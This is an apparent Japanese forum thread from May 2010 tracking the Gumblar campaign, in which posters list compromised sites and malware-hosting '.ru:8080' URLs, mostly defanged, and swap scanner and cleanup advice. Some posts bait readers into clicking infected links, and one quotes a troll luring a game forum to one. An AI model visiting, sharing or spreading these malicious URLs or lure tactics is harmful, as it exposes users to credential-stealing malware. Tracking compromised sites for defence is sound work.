10/05/07 14:16:53
www●hd-cre●com/bj-fh ←なんだこれ?
newegg-com●paypal●com●renren-com●wayoutmall●ru:8080/・・・以下略
<?eval(base64_decode("Cm1i・・・
あふぃ・・・なのか?
443:名無しさん@お腹いっぱい。
10/05/07 14:39:16
>>442
憶測は書くな。
444:名無しさん@お腹いっぱい。
10/05/07 17:24:20
それはそうとflash playerは10.0.45.2からしばらく更新が無いね
445:コテハン ◆8080adndqg
10/05/07 18:00:22
>>443 [・皿・;]
--
【陥落サイトのURL悪用厳禁】
blog●ceed●jp/ ←サイト内全滅w(.jsも)
myako●net/ ←中途半端な修正
※java2/imgkotei●js
www●hds-x●com/ ←Refresh
↓
www●hds-x●com/top●html ←Gumblarがw
doujinnews●jp
446:名無しさん@お腹いっぱい。
10/05/07 18:20:53
>>445
一番下のドメインがこわい
447:名無しさん@お腹いっぱい。
10/05/07 18:21:23
気になるのだが
そのサイトのトップにはgumblerがあったとしても
そのサイトのトップ以外のページ(コラムとか他サイトへのリンクページとか)にはgumblerが無く
そこを見る分には大丈夫という場合はあるのか
まあ、>>2の対策をしていてもわざわざそんなページを見に行く物好きもそういないとおもうけど
448:名無しさん@お腹いっぱい。
10/05/07 18:22:10
>>444
そろそろまた新しいゼロデイが発生する頃だよな…
来月か再来月くらいのWindowsUpdateの前後に更新されると予想
449:名無しさん@お腹いっぱい。
10/05/07 18:23:10
>>447
あるけどいつ埋め込まれるかわからんしおすすめはしない
450:名無しさん@お腹いっぱい。
10/05/07 18:36:05
doujinnewsのとこ一番下だけじゃなく一番上にもあるのか
初めて見たけどいままで気付かなかっただけかな
451:名無しさん@お腹いっぱい。
10/05/07 18:57:55
adobeのセキュリティ意識の低さはもう完全に露呈されたんだから
flashplayerの代替品をMS辺りが用意してくれよ
452:名無しさん@お腹いっぱい。
10/05/07 19:20:07
>>451
F-Secureブログで、F-Secureで開発するかもって言ってた
453:名無しさん@お腹いっぱい。
10/05/07 19:20:48
>>451
つsilver light
454:名無しさん@お腹いっぱい。
10/05/07 20:25:13
>>451
どう間違ったらそこでMSなんだよ
455:名無しさん@お腹いっぱい。
10/05/07 20:57:52
>>453
silver lightは代替手段としてはありだと思うが
今の半分くらいまで負荷を下げてくれないと低スペPCがつらい
あとグラボの再生支援への対応
456:名無しさん@お腹いっぱい。
10/05/07 21:02:25
×silver light
○Silverlight
457:名無しさん@お腹いっぱい。
10/05/07 21:28:43
HTML5でいいじゃん
458:名無しさん@お腹いっぱい。
10/05/07 21:38:23
現時点ではHTML5用のリッチコンテンツを簡単に作るようなツールがないからなあ…
459:名無しさん@お腹いっぱい。
10/05/07 22:08:32
codec決まってないべ
460:名無しさん@お腹いっぱい。
10/05/07 22:23:10
IE9ではH.264のみらしいけど
461:コテハン ◆8080adndqg
10/05/07 23:37:20
doujinnews●jp 検索結果 約 7,730 件
www●google●co●jp/search?q=site%3Adoujinnews●jp&btnG=%E6%A4%9C%E7%B4%A2&hl=ja&lr=&sa=2
\(^o^)/オワタ
462:名無しさん@お腹いっぱい。
10/05/08 00:23:21
ガンブラー攻撃が常態化、トレンドマイクロ、4月のウイルス感染・報告ランキング(japan.internet.com)
URLリンク(headlines.yahoo.co.jp)
Yahooトップ
463:名無しさん@お腹いっぱい。
10/05/08 00:33:51
>>461
なんか気のせいか物凄まじくやばいような。
464:名無しさん@お腹いっぱい。
10/05/08 00:34:24
さっきMSEでTrojanDownloader:JS/Psyme.genが検出されたがGumblar?
465:名無しさん@お腹いっぱい。
10/05/08 00:34:37
俺もついに感染したようだ。このスレのアドレス開いてから
すぐにブルースクリーンになったりで調子が悪い
466:名無しさん@お腹いっぱい。
10/05/08 00:41:40
>>465
Kaspersky File Scanner オンラインウイルススキャン
URLリンク(blog.ceed.jp)
これで検出されなければ感染してないよ
467:名無しさん@お腹いっぱい。
10/05/08 00:48:06
>>465
Online Scanner
URLリンク(www.f-secure.com)
468:名無しさん@お腹いっぱい。
10/05/08 00:57:17
>>466-467
乙。
469:名無しさん@お腹いっぱい。
10/05/08 01:01:20
>>466-467ってKasperskyやF-secure以外のアンチウイルスソフト使っててもスキャン出来るの?
470:名無しさん@お腹いっぱい。
10/05/08 01:06:01
>>469
は?
471:名無しさん@お腹いっぱい。
10/05/08 01:08:24
>>470
あれ 競合しないのか
472:名無しさん@お腹いっぱい。
10/05/08 01:08:31
オンラインスキャンがなんたるかをよく理解してないらしい
473:名無しさん@お腹いっぱい。
10/05/08 01:08:37
>オンラインウイルススキャン
>Online Scanner
474:名無しさん@お腹いっぱい。
10/05/08 01:10:18
>>471
そんな認識だからPCウイルスに感染するんだぞ(笑)
475:名無しさん@お腹いっぱい。
10/05/08 01:12:23
>>465
このスレのアドレス?
このスレ開いたら感染するのか?
476:名無しさん@お腹いっぱい。
10/05/08 01:17:55
>>474
ホントにな…
477:名無しさん@お腹いっぱい。
10/05/08 01:25:00
>>464
トロイの木馬だけどGumblarでは無いな
478:名無しさん@お腹いっぱい。
10/05/08 01:25:45
>>475
うん
479:名無しさん@お腹いっぱい。
10/05/08 01:31:02
>>478
そんなこと全然ないけど?
live2chで見てるけど全然平気なんだけど
>>2の対策をしてるからかな?
480:名無しさん@お腹いっぱい。
10/05/08 01:33:50
>このスレのアドレス?
うん
>このスレ開いたら感染するのか?
うん
どっちやねん
481:名無しさん@お腹いっぱい。
10/05/08 01:36:51
>>479
信じるなよw
482:名無しさん@お腹いっぱい。
10/05/08 01:53:25
PDFに埋め込まれた全プログラムを無効化できるようになった「Foxit Reader」v3.3
URLリンク(www.forest.impress.co.jp)
これどうなんだろ?
483:名無しさん@お腹いっぱい。
10/05/08 02:07:23
対策もしてないのにこのスレで挙げられてる陥落サイトのアドレスを
うっかり踏んじゃったってことじゃないか。
484:名無しさん@お腹いっぱい。
10/05/08 02:27:36
>>466-476
競合もしないレベルで動くオンラインスキャン使ってスキャンして、
それで何もないからってどれ位の意味なの
485:名無しさん@お腹いっぱい。
10/05/08 02:29:52
結局そのオンラインスキャンを実行してるのは、感染疑いのあるそのPC自体でしょ
すくなくともインストールして使うもの利用したほうがいいのかね
486:名無しさん@お腹いっぱい。
10/05/08 03:12:02
doujinnewsのやつ
URLリンク(www.virustotal.com)
結果: 1/41 (2.44%)
McAfee-GW-Edition:Heuristic.BehavesLike.HTML.Shellcode.K
487:名無しさん@お腹いっぱい。
10/05/08 08:17:07
>>466のアドレスへ行ったのですが、
Kasperskyのオンラインスキャンがあるのかわかりません。
どなたか教えてください。よろしくお願いします。
488:名無しさん@お腹いっぱい。
10/05/08 08:36:53
>>487
そこGumblarの可能性ありって出るよ
489:名無しさん@お腹いっぱい。
10/05/08 09:09:12
www●spoffice●jp
株式会社セカンドプランニング この会社が関わっている
yamatwo●jp
www●sobank●jp
www●spoffice●jp
全てが改ざん
490:名無しさん@お腹いっぱい。
10/05/08 09:23:25
>>488
そうですか・・・
教えてくださってありがとうございます。
一応>>2-3あたりの対策はしているのですが
クリーンインストールした方がいいですか?
何度もすいません。
491:名無しさん@お腹いっぱい。
10/05/08 09:35:13
ネット上にあがってるWebサイトの改竄方法を教えてください
ウイルスを仕込むわけではなくバナーを消したり文章を変える程度です
Web改竄について詳しく書いてあるサイトを教えてくれる形でもいいです
お願いします
492:名無しさん@お腹いっぱい。
10/05/08 09:40:27
スレチだゴミ
493:名無しさん@お腹いっぱい。
10/05/08 09:57:54
最近嘘書いて改ざんサイトに誘導するバカが出没してるな
しかもそれに対して大体レスが付くことから自演を駆使してるようだ
どうせ>>465-471あたりは同一人物だろ
でもって>>490はキモイ流れになってる事とおかしなURLから危険を察しろ
494:名無しさん@お腹いっぱい。
10/05/08 11:53:36
suncs●sakura●ne●jp
www●kfbclub●com
495:名無しさん@お腹いっぱい。
10/05/08 12:06:55
>>490
URLがそのままなのはまあ黒だろ
迂闊に踏む前にちょっと流れ見るべきだね
どうせ誘導したいクソは自分が踏んで感染した腹いせなんだろうが
ひょいとのぞきに来たような人は無理に流れに参加しようとしなくていい
496:名無しさん@お腹いっぱい。
10/05/08 12:47:39
>>493>>495
ご迷惑掛けてすいません。
クリーンインストールはいいのですが
残しておきたいデータなどがあるのでほんと落ち込んでます。
今は起動させてない外付けがあるのですが、
そちらに移すと外付けの方にもダメになりますか?
基本的なことかもしれませんがどうか教えてください。
497:名無しさん@お腹いっぱい。
10/05/08 13:38:36
>>496
そんな大事なデータをバックアップとっていないのなら
今回は勉強として諦めた方がいいよ
悔しいのはわかるけどね
498:名無しさん@お腹いっぱい。
10/05/08 13:39:35
>>496
ざまあああああ
499:名無しさん@お腹いっぱい。
10/05/08 14:16:12
>>496 aguseで確認
dirtysin.ru:8080○google.com○kakaku.com○110mb.com○php
ご愁傷様・・・
500:名無しさん@お腹いっぱい。
10/05/08 14:31:59
最近のGumblarはGENOみたいに動作が重くなるとか変なファイル作成はあるのかなあ
501:名無しさん@お腹いっぱい。
10/05/08 14:44:03
>>2をしっかりやってても踏んだら感染するのか?・・
502:名無しさん@お腹いっぱい。
10/05/08 15:03:13
MyJVNバージョンチェッカ IE8に対応すればいいのになあ
URLリンク(jvndb.jvn.jp)
503:名無しさん@お腹いっぱい。
10/05/08 15:21:11
Windows 7にも未対応だって笑わせるな
504:名無しさん@お腹いっぱい。
10/05/08 16:00:29
>>496
そんな大事なら他のメディアに移すことも考えてみたら
Gumblarの挙動の基本はサイトの管理者アカウントを盗むことらしいし
亜種だったら他のこともするらしいけど
このスレにそこらの書き込みあったと思うよ
一方でOSクリーンインストールする時には、HDD上にデータはすべて消してからのがいいんだろうね多分
505:名無しさん@お腹いっぱい。
10/05/08 16:01:49
107 :('д') ◆yUyb3Tqn92 :2010/05/08(土) 15:04:26 ID:f48FTMOs
>>97はここのコピペだぞw
URLリンク(blog.ceed.jp)
よくできておるのう ´,дゝ`)コピペにマジレス乙だお
↑を踏んでしまいました。
このコテが言うにはガンブラウィルスらしいのですが、釣りや脅しのような気がするので鑑定よろ
506:名無しさん@お腹いっぱい。
10/05/08 16:07:14
アドレス貼りのルールも守れない馬鹿にはいい気味だ
507:名無しさん@お腹いっぱい。
10/05/08 16:08:20
>>505
馬鹿か
すれ違いじゃ
508:名無しさん@お腹いっぱい。
10/05/08 16:09:11
>>506
馬鹿
所詮ローカルルールだと気づけ馬鹿
509:名無しさん@お腹いっぱい。
10/05/08 16:10:02
505 ざまぁwwww
510:名無しさん@お腹いっぱい。
10/05/08 16:10:04
sageろとかいう馬鹿と同じで
システム上できることは仕様だから仕方ないさ
よほどのことしないかぎりね。
511:名無しさん@お腹いっぱい。
10/05/08 16:11:06
マジレスすると('д')のコテ付けた奴はウィルス貼ってる常習犯なわけだが
今回ばかりは505みたいな阿呆にウィルスを踏ませた('д')をGJと言いたいwwwwwww
512:名無しさん@お腹いっぱい。
10/05/08 16:11:46
ガチでGumblarだしざまぁ
URLリンク(dirtysin)●ru:8080/google●com/kakaku●com/110mb●com●php
513:名無しさん@お腹いっぱい。
10/05/08 16:14:02
>>512
>>5や>>91のチェッカー全部スルーしてやがる
514:名無しさん@お腹いっぱい。
10/05/08 16:16:11
os:win7 64bit アップデート済み
northon2010 更新済み
adobe reader 最新ver
JREはup17だったと思われ。
この環境で上記URL踏んでしまったのだが
ノートン先生でフル検索かけてもウィルスが見つからない。
後外部から自分のPCに向けてポートスキャンかけてみたけど(LANで)、異常無し。
普段wimaxで接続してるからgkbrなんだが…さてはて
515:名無しさん@お腹いっぱい。
10/05/08 16:18:00
上記
516:514
10/05/08 16:21:53
おいらが踏んだのはこれです。
URLリンク(blog)<)○megalodon.jp/2008-0922-1659-16/www○geocities○com/imomushi2005/imomushi20○htm
これを踏んで
Nine-Ball Mass Injectionがどうたらって警告が出たので
その対策を調べに来ていてやられました。マジ情けない…
517:名無しさん@お腹いっぱい。
10/05/08 16:26:01
>>516
お前>>505だろwwwwwwwwwwww
だからURL貼り忘れたんだべwwwwwww他いけよもうw
518:491
10/05/08 16:28:33
>>492
スレチかもしれませんがここのスレの人が一番詳しそうなので>>491について教えてくださいお願いします
519:名無しさん@お腹いっぱい。
10/05/08 16:31:51
ママに聞けクソガキ
520:名無しさん@お腹いっぱい。
10/05/08 16:33:13
>>518
犯罪
521:名無しさん@お腹いっぱい。
10/05/08 16:41:42
>>518
ばーか
522:名無しさん@お腹いっぱい。
10/05/08 16:46:15
>>518
バカ
523:名無しさん@お腹いっぱい。
10/05/08 16:47:28
いろいろ、ヘンなのが沸いてきたね。
連休疲れ?
524:名無しさん@お腹いっぱい。
10/05/08 16:54:24
>>518
ハ _
___ ∥ヾ ハ
/ ヽ ∥::::|l ∥:||.
/ 聞 え | ||:::::::|| ||:::||
| こ ? | |{:::::∥. . .||:::||
| え | _」ゝ/'--―- 、|{::ノ!
| な 何 | / __ `'〈
| い ? ! /´ /´ ● __ ヽ
ヽ / / ゝ....ノ /´● i
` ー―< { ゝ- ′ |
厶-― r l> |
∠ヽ ゝ-― `r-ト、_,) |
レ^ヾ ヽ>' ̄ LL/ 、 /
.l ヾ:ヽ ` 、_ \\ '
l ヾ:ヽ ト`ー-r-;;y‐T^
| ヾ `ニニ「〈〉フ /∥. j
525:名無しさん@お腹いっぱい。
10/05/08 17:26:33
>>517
違うんじゃないか
urlが中途半端に違う
このスレで踏んだ奴だろ
>>505は、=>>508=>>510
つーか規制食らったww
526:コテハン ◆8080adndqg
10/05/08 18:49:58
>>501
最新版に更新済でも、JAVAの旧バージョンの残骸が残ってたりすると
やられてしまう可能性があるのです・・・
このスレの住人以外の方へ>
貼ってあるアヤシイURLは直接踏まず
【aguse Gateway】
URLリンク(gw.aguse.jp)
ここを使いましょう。
>aguse Gatewayとは?
スクリーンキャプチャを使った完全に安全なブラウザ型ゲートウェイです。
>サイトを1枚ずつキャプチャして見せ、ブラウザに準じた動作が可能です。
527:名無しさん@お腹いっぱい。
10/05/08 18:57:29
感染確認方法がないのが怖い
528:名無しさん@お腹いっぱい。
10/05/08 18:57:33
aguseは現状のGumblar検出用には当てにならん
あやしいURLリンク(www.example.com:8080)の:8080とかは検出してくれるけど
そこも注意深く見ないと安全なサイトにしか見えないし
529:名無しさん@お腹いっぱい。
10/05/08 19:31:17
なんかFTPのパス抜かれるだけ、って結論に上の方でなってるけど、
確か最初はネトゲのパスが抜かれてたような記憶がある
去年の夏ごろの上に出てたAsian motorsのサイトだったような気が、、、
てか、感染サイトのお知らせ、アンチウイルスサイトのアドレス貼って、そこ行け、で済ませてる所多いけど、
感染してたらウイルス除去、だけじゃ済まんだろ。
FTP以外のパス変えたり、クレカ会社に連絡しなきゃ、たとえクリーンストールしても、
意味無いような気がする。
530:名無しさん@お腹いっぱい。
10/05/08 19:49:03
三井住友VISAはあの程度で済ますとか被害わかってやってんのかな?
仮にもクレジットカード会社の取る行動じゃないよな
531:名無しさん@お腹いっぱい。
10/05/08 20:56:50
>>512
VirusTotalだとどうなのだろう
532:名無しさん@お腹いっぱい。
10/05/08 21:01:57
まあ心配ならゲーム機でネット見るとかすればいいんじゃね
533:名無しさん@お腹いっぱい。
10/05/08 21:07:17
何だか>>504以降の書き込み時間が近接してるな
534:名無しさん@お腹いっぱい。
10/05/08 21:11:34
>>518
それ改ざんとはいわないだろ
要するに広告ブロックとかしたいんじゃないの
あとはぐぐれ
535:名無しさん@お腹いっぱい。
10/05/08 21:12:36
>>529
そんな結論にはなってないとおもうよ
536:名無しさん@お腹いっぱい。
10/05/08 21:20:19
>>532
KNOPPIXをDVD起動で使用
537:名無しさん@お腹いっぱい。
10/05/08 22:39:44
KNOPPIXをusb起動で使用
538:名無しさん@お腹いっぱい。
10/05/08 23:27:54
>>534
広告ブロックではなく文章や写真を少しだけ変えて知り合いを驚かせたいんです。
そのためには管理者側としてソースコードを書き換える必要があると思うのですが
難しいのでしょうか?
ちょっとした自己掲示欲でウイルスを入れようなどは考えていません。
ここにいる人は詳しいと思ったのでここで質問させていただきました。
539:名無しさん@お腹いっぱい。
10/05/08 23:29:33
本当の意味での改竄じゃん
540:名無しさん@お腹いっぱい。
10/05/08 23:32:42
それは犯罪w
541:名無しさん@お腹いっぱい。
10/05/08 23:35:05
>>538
失せろダニ
542:名無しさん@お腹いっぱい。
10/05/08 23:36:44
>>538
( ゚,_ゝ゚)バカジャネーノ
543:名無しさん@お腹いっぱい。
10/05/08 23:41:14
自己掲示欲て
544:名無しさん@お腹いっぱい。
10/05/08 23:43:05
>>538
それは犯罪です
545:名無しさん@お腹いっぱい。
10/05/08 23:44:58
>>516
これってここに貼ってあったやつだけど改竄されてるか?
今見たけどカスペもシマンテックもアバストも特に反応しねーが
546:名無しさん@お腹いっぱい。
10/05/08 23:46:53
>>538
あまりにも幼稚な発想でこわいわ
お前がサイト持ってて突然改ざんされたら驚く程度では済まなくね?
恐怖感のほうが強いはず
ストーカーか何かなの?
軽いイタズラじゃ済まないよ
547:名無しさん@お腹いっぱい。
10/05/08 23:48:59
>>545
上はこっそり修正したのかもしれん
Date: Sat, 08 May 2010 14:47:09 GMT
たぶんそのうちまた再改ざんされるんじゃね
548:名無しさん@お腹いっぱい。
10/05/08 23:49:29
>>545
今は直ってるけど、少なくともURLリンク(blog)●ceed●jp/は>>512が埋まってた
549:名無しさん@お腹いっぱい。
10/05/08 23:58:07
>>547->>548
なるほど、サンクス
修正はされたけどアナウンスはされてないのねw
550:名無しさん@お腹いっぱい。
10/05/09 00:14:37
>>548
そのURL踏むとPC動作重くなったり何かファイル組みこんだりする?
551:名無しさん@お腹いっぱい。
10/05/09 01:40:48
>>550
過去に踏んでしまったのならそういうこともあるかもしれません
552:名無しさん@お腹いっぱい。
10/05/09 02:08:06
>>538
てめー24しとくわ
せいぜい家でマッポがいつくるかガクブルして待ってろ
553:名無しさん@お腹いっぱい。
10/05/09 02:08:16
>>549
>514です。aguseで昨日の12:00頃調べた時には,>>512が検出されました。
Norton Safe Webで調べてみたところ、以前同サーバの別ページ?で
Bloodhound.Exploit.292の存在が確認されている模様。
パスワードやクレジットカード情報などを盗むウィルスに分類されているようですが
windows7への感染は無いっぽい?よく分からん。
554:名無しさん@お腹いっぱい。
10/05/09 13:22:54
こっそり修正が一番たちが悪い
IPAかJPCERTのGumblarにかかったらどうするかって所に
・公表する
・ホームページの管理者なら、いつからいつまでの間ウィルスが埋め込まれていたのか明らかにする
って内容があった気がする
>>516の上は最低だな
555:名無しさん@お腹いっぱい。
10/05/09 13:48:15
ハニーホエール ってどう?
556:名無しさん@お腹いっぱい。
10/05/09 15:00:07
こりか。
URLリンク(www.lac.co.jp)
557:名無しさん@お腹いっぱい。
10/05/09 15:50:45
>>554
まあそういうことをやるとこはポカするたびにこっそり書き換えとかやって段々信用を無くしてくよ
セキュリティ関係ないけどアクティスの電源とかな
558:コテハン ◆8080adndqg
10/05/09 16:18:44
【陥落サイトのURL悪用厳禁】
slmo●co●jp/
www●hd-cre●com/ ←ここはやられてないけど・・・
↓
www●google●co●jp/search?hl=ja&q=site%3Ahd-cre●com%2F&btnG=%E6%A4%9C%E7%B4%A2&lr=
559:名無しさん@お腹いっぱい。
10/05/09 16:20:32
>>555
こりか。
URLリンク(samspade.org)
560:名無しさん@お腹いっぱい。
10/05/09 16:36:48
>>555
>>556
>>559
これはおそらく自演
迂闊に踏むなよ
561:名無しさん@お腹いっぱい。
10/05/09 16:51:54
このスレに住みついてる奴に知らないアドレスをホイホイと踏む馬鹿は居ないと思うが・・・
まぁ外部から興味本位で来て引っ掛かった奴は「ご愁傷さまだ、さっさとクリーンインストールして来い」で良いと思う
562:名無しさん@お腹いっぱい。
10/05/09 17:08:55
普通のリンクじゃん
馬鹿じゃないの
563:名無しさん@お腹いっぱい。
10/05/09 17:45:35
>>557
段々信用をなくすって言うけど元からないだろう。こういうとこは。
564:名無しさん@お腹いっぱい。
10/05/09 17:51:24
>>561
ご愁傷さま
565:名無しさん@お腹いっぱい。
10/05/09 20:42:15
>>560
アンカーつけると削除依頼が通らなくなるぞ
566:名無しさん@お腹いっぱい。
10/05/09 21:50:14
もみじ 乙!
567:名無しさん@お腹いっぱい。
10/05/09 22:42:05
>>565
アンカーつけるところまで自演じゃないの?
568:名無しさん@お腹いっぱい。
10/05/10 00:32:44
www●historyasia●com/Scripts/AC_RunActiveContent●js
傑作な改竄修正。
管理人は一体何を考えているんだ…
569:名無しさん@お腹いっぱい。
10/05/10 03:25:34
>>568
//12Apr2010 : Malware script
ところどころコメントアウトしてあったり、なかったりw
570:名無しさん@お腹いっぱい。
10/05/10 03:42:17
まだあったのかこのスレ
久しぶりすぎる
571:名無しさん@お腹いっぱい。
10/05/10 05:37:59
>>494
下 >ホームページに関するお詫びとお知らせ
572:名無しさん@お腹いっぱい。
10/05/10 10:41:22
質問があるのですが
ruドメインとcnドメインのサイトは全て危険とみなしてよいのでしょうか?
573:名無しさん@お腹いっぱい。
10/05/10 11:39:45
見なしてもいいけど、それが絶対じゃない
ブラジルとか最近spamの温床になってきてる新興国や発展途上国なんかは要注意だね
574:名無しさん@お腹いっぱい。
10/05/10 12:56:05
.infoとかでも罠サイトがあったって話だし、ドメインだけじゃ判断できなくなってきてる
そのうちcomとかjpもできるんじゃないかね
575:名無しさん@お腹いっぱい。
10/05/10 13:03:32
>>574
comは既にあるらしい
「.ru」ドメイン対策では防げない「Gumblar」攻撃 - マルウェア配布サイトに「.com」などが
URLリンク(www.security-next.com)
576:名無しさん@お腹いっぱい。
10/05/10 13:57:51
新種
stompstamp●com
577:名無しさん@お腹いっぱい。
10/05/10 15:19:55
>>572
全部危険ってわけじゃないだろ。
McAfeeは毎年危ないTLDを発表してるが、2009年は
cm(カメルーン)
com(gTLD)
cn(中国)
ws(サモア)
info(gTLD)
の順だった。
PDF www.mcafee.com/common/media/mcafeeb2b/international/japan/pdf/threatreport/2009_MTMW_Report.pdf
cnは昨年12月14日から、ruは4月1日から登録が面倒になった(書類審査)。
今後は他のが増えてくるんじゃね。
578:名無しさん@お腹いっぱい。
10/05/10 17:15:58
ネット鎖国も防衛手段としては有効だぜ?
579:名無しさん@お腹いっぱい。
10/05/10 17:29:13
URLリンク(www.k)●naka.jp/fs/k●naka/Information.html
ちょっと確認してもらえないか
580:名無しさん@お腹いっぱい。
10/05/10 17:30:33
>>579
ここはそういうスレじゃない
581:名無しさん@お腹いっぱい。
10/05/10 18:01:05
>>579
bloodhound.exploit.292
>>580
死ね
>>553
582:名無しさん@お腹いっぱい。
10/05/10 18:43:41
>>581
>>1も読まないやつに答えるなよ
そういうことするからまた同じバカが出てくるんだろ
583:名無しさん@お腹いっぱい。
10/05/10 19:27:43
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
>>581
584:名無しさん@お腹いっぱい。
10/05/10 19:37:25
>>581
GJ!
585:名無しさん@お腹いっぱい。
10/05/10 19:57:32
IDやパスワード抜かれるというけど
ftpだけでなく動画サイトやネット接続のID、パスワードも抜かれるのだろうか
586:名無しさん@お腹いっぱい。
10/05/10 20:33:10
誘導されてきました。お話中おそれいります。
サイト持ちです。
このサイトはコンピュータに損害を与える可能性があります
グーグルでこの表示が出たとの知らせをうけて、該当ページから挿入されたスクリプトを除去し、再アップしました。
しかしながら、今後も同様のケースが考えられるので根底から対処しないといけないということです。
ウイルス除去タイプのプロバイダーを使っていたので、今まで安心していました。
今後サイトに変なスクリプトが挿入されないようにするには、どういった対処がおすすめでしょうか。
皆さんの意見をお願いします。※スレチであれば、誘導もお願いします。
587:名無しさん@お腹いっぱい。
10/05/10 20:38:10
ホームページさっさと閉鎖してアラスカで隠居してください
588:名無しさん@お腹いっぱい。
10/05/10 20:39:12
>>586
URLリンク(www.ipa.go.jp)
589:名無しさん@お腹いっぱい。
10/05/10 20:48:13
>>586
あなたのPCに何か感染していますので
とっととクリーンインストールしてください。
590:名無しさん@お腹いっぱい。
10/05/10 21:05:18
>>585
ネット接続のパス抜かれたら終わりだ・・・
Gumblarで実際にそうなるのかねえ
591:名無しさん@お腹いっぱい。
10/05/10 21:12:27
>>585
通信を監視していますので非セキュアな通信はすべて筒抜けです
592:名無しさん@お腹いっぱい。
10/05/10 21:15:28
>>586
セキュリティ対策ソフト入れないってのはありえないわ
根底から対処っていうのはOS入れなおせっていう意味だよ
593:名無しさん@お腹いっぱい。
10/05/10 21:35:29
>>591
最悪ネット接続すら出来ないのか gkbr
594:名無しさん@お腹いっぱい。
10/05/10 21:36:54
>>592とか何の対策にもなってないんだがw
煽るのもいいけど、FTPのパスワードは最低変えておけぐらい言えばいいのに
595:名無しさん@お腹いっぱい。
10/05/10 21:43:00
>>591
よく分からんなFWは無力なのか?
596:名無しさん@お腹いっぱい。
10/05/10 21:49:40
こっちも。
URLリンク(www.ipa.go.jp)
(3)ウェブサイト改ざんの被害発生時の対処
特に利用者の告知は必須。
ウイルスのチェック方法等をあわせて告知しないと、被害が拡大する↓
URLリンク(detail.chiebukuro.yahoo.co.jp)
597:名無しさん@お腹いっぱい。
10/05/10 21:51:25
>>594
感染PCから変えても無駄だろ
598:名無しさん@お腹いっぱい。
10/05/10 21:55:13
586です
対処します。ありがとうございました。
599:名無しさん@お腹いっぱい。
10/05/10 21:58:08
>>593
ISPからの個人あてメールも削除おすすめ・・・かも
600:名無しさん@お腹いっぱい。
10/05/10 22:08:59
>>588や>>596を確認せずにホイホイ踏むようなら、救いようがないな
601:名無しさん@お腹いっぱい。
10/05/10 22:33:18
gnome「夕張メロン熊かわいいよ夕張メロン熊」
602:名無しさん@お腹いっぱい。
10/05/10 22:36:25
Adobe Reader以外のPDFソフトでJavaScript関連の他に気をつける事はあるの?
603:名無しさん@お腹いっぱい。
10/05/10 23:06:12
PDF X-Change ViewerにだってJavaScriptはあるぞとだけ
604:名無しさん@お腹いっぱい。
10/05/10 23:29:19
Office97や2000で散々マクロウィルス叩かれたけど、
だからといって、一太郎や花子に脆弱性が無いという保障にはならない
605:名無しさん@お腹いっぱい。
10/05/10 23:31:59
一太郎とか最近狙われたばっかじゃん
606:名無しさん@お腹いっぱい。
10/05/10 23:44:53
ここ2~3年くらいで急に狙われ出したな>一太郎
あとATOKも
607:名無しさん@お腹いっぱい。
10/05/10 23:58:33
【陥落サイトのURL悪用厳禁】
sound●jp/kimitoiumizunonakade/
fourlcp●com
>>576
色々やってみた
上:
URLリンク(www.virustotal.com)
下(全部):
URLリンク(www.virustotal.com)
下(<script></script>のみ):
URLリンク(www.virustotal.com)
swfobject.js:
URLリンク(www.virustotal.com)
「「Gumblar」関連のウイルスがランキング上位に - 「一太郎」狙いのゼロデイ攻撃も」
URLリンク(www.security-next.com)
608:名無しさん@お腹いっぱい。
10/05/11 00:03:47
>>607
MSE使えねー
609:名無しさん@お腹いっぱい。
10/05/11 00:17:32
ところでこのサイトの主にウイルスを駆除させる妙案はないものでしょうか
myako●net
昨日だけで9000人以上が閲覧
早急にどうにかしないとまずいのに何度メール送ってもスルーされる…
610:名無しさん@お腹いっぱい。
10/05/11 00:25:15
>>609
確認できないんだが
611:名無しさん@お腹いっぱい。
10/05/11 00:39:59
>>609
こちらの環境でも現在は修正及びサブドメインは403にされている模様です。
612:名無しさん@お腹いっぱい。
10/05/11 00:43:59
>>611撤回
残ってた>>445 Last-Modified: Sun, 11 Apr 2010 21:36:14 GMT
alienear●ru
613:名無しさん@お腹いっぱい。
10/05/11 00:54:14
>>610
aguseじゃでなかったけどgredだとでたぞ
614:名無しさん@お腹いっぱい。
10/05/11 01:18:41
>>613
ここの
myako.net/download/down2.cgi
これがやられてるね。
myako.net/download/kensakumdl.js
615:名無しさん@お腹いっぱい。
10/05/11 01:23:15
myako.net/java2/amophoto/zidouslide.html
myako.net/juke.html
myako.net/java2/amophoto/photo.html
この辺も
616:名無しさん@お腹いっぱい。
10/05/11 01:28:26
myako.net/download/
ここ全部やられてる
617:名無しさん@お腹いっぱい。
10/05/11 01:33:17
8080系のサイト改竄って管理人には解んないのかな?
結構出入りの多そうなサイトだし…HP作成のjs配布サイトってw
618:名無しさん@お腹いっぱい。
10/05/11 01:35:40
>>614-616
>>1
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
>>609
myako●net [219●94●128●187] www947●sakura●ne●jp
>>7のさくらにつーほーすますた。
619:名無しさん@お腹いっぱい。
10/05/11 01:36:47
>>618
乙です
620:名無しさん@お腹いっぱい。
10/05/11 01:38:49
gredはスルーしすぎ
621:613
10/05/11 01:52:32
>gredはスルーしすぎ
俺もAVは入れて無いんだけどね
622:名無しさん@お腹いっぱい。
10/05/11 01:56:38
朝までに緑になってますように (-人-)
URLリンク(www.google.com)
623:この'誰の' ◆yUyb3Tqn92
10/05/11 04:45:26
(*'д'*)v
477 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:33:22 ID:38FsBWE+0
>>476
法則にそってレアアイテム手に入れる方法あるぞ
URLリンク(myako.net)
チート嫌いなら別だがね
478 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:34:48 ID:Zp72kWEj0
>>477
裏技でプレイするのは最後の手段だろ
479 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:36:01 ID:ZTLYXdOv0
>>477
そんな法則あったんだな、今2匹目で普通に出ちゃったから別ので詰まったら試してみよう
480 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:37:56 ID:YMFIRoo+0
しっぷう、しっぷう、ラウンドゼロ
これマジでどうすりゃいいの?
たまに当たっても何もできないまま負けるんだけど…
481 :名前が無い@ただの名無しのようだ:2010/05/11(火) 04:38:05 ID:Zp72kWEj0
>>479
握手しよう
482 :('д') ◆yUyb3Tqn92 :2010/05/11(火) 04:40:33 ID:Zp72kWEj0
Д< クククク、引っかかったな愚かな勇者ども
624:この'誰の' ◆yUyb3Tqn92
10/05/11 04:48:55
('`д´')エッヘン
